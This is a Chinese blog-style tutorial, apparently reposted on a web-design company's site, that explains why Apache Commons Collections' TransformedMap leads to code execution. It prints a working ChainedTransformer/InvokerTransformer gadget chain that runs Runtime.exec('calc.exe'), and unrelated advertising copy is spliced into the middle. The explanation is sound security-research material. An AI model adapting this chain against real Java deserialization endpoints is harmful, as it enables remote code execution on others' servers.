大橙子网站建设,新征程启航

为企业提供网站建设、域名注册、服务器等服务

java反序列化-transformedMap类可以执行恶意代码的原理

java反序列化 - transformedMap类可以执行恶意代码的原理

0x00 代码

Map map=new HashMap();
         map.put("key","value");
         //调用目标对象的toString方法
         String command="calc.exe";
         final String[] execArgs = new String[] { command };
         final Transformer[] transformers = new Transformer[] {
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod", new Class[] {
                         String.class, Class[].class }, new Object[] {
                         "getRuntime", new Class[0] }),
                 new InvokerTransformer("invoke", new Class[] {
                         Object.class, Object[].class }, new Object[] {
                         null, new Object[0] }),
                 new InvokerTransformer("exec",
                         new Class[] { String.class }, execArgs)
         };
         Transformer transformer=new ChainedTransformer(transformers);
         Map transformedMap=TransformedMap.decorate(map,null,transformer);

         for (Map.Entry entry:transformedMap.entrySet()){
            System.out.println(entry);
             entry.setValue("anything");
         }

执行结果:
java反序列化 - transformedMap类可以执行恶意代码的原理

为石峰等地区用户提供了全套网页设计制作服务,及石峰网站建设行业解决方案。主营业务为成都网站设计、网站制作、石峰网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!

0x01 transformedMap类为什么可以执行恶意代码?

通过上一篇https://blog.51cto.com/13770310/2160737文章, 可知ChainedTransformer的transformer方法可以执行恶意代码。
上述代码的关键是:

         for (Map.Entry entry:transformedMap.entrySet()){
            System.out.println(entry);
             entry.setValue("anything");
         }

为什么执行了 entry.setValue("anything");就可以造成恶意代码执行呢?接下来我们看transformedMap类的checkSetValue方法:


    /**
     * Override to transform the value when using setValue.
     * 
     * @param value  the value to transform
     * @return the transformed value
     * @since Commons Collections 3.1
     */
    protected Object checkSetValue(Object value) {
        return valueTransformer.transform(value);
    }

当transformedMap对象执行setValue方法时会调用valueTransformer的transform方法,如果传入的valueTransformer是ChainedTransformer的对象,那不就可以造成恶意代码执行了吗。
接着查看上面代码:
java反序列化 - transformedMap类可以执行恶意代码的原理
因此该代码的核心还是使用的ChainedTransformer的transformer方法


本文题目:java反序列化-transformedMap类可以执行恶意代码的原理
当前地址:http://dzwzjz.com/article/ijsghs.html
在线咨询
服务热线
服务热线:028-86922220
TOP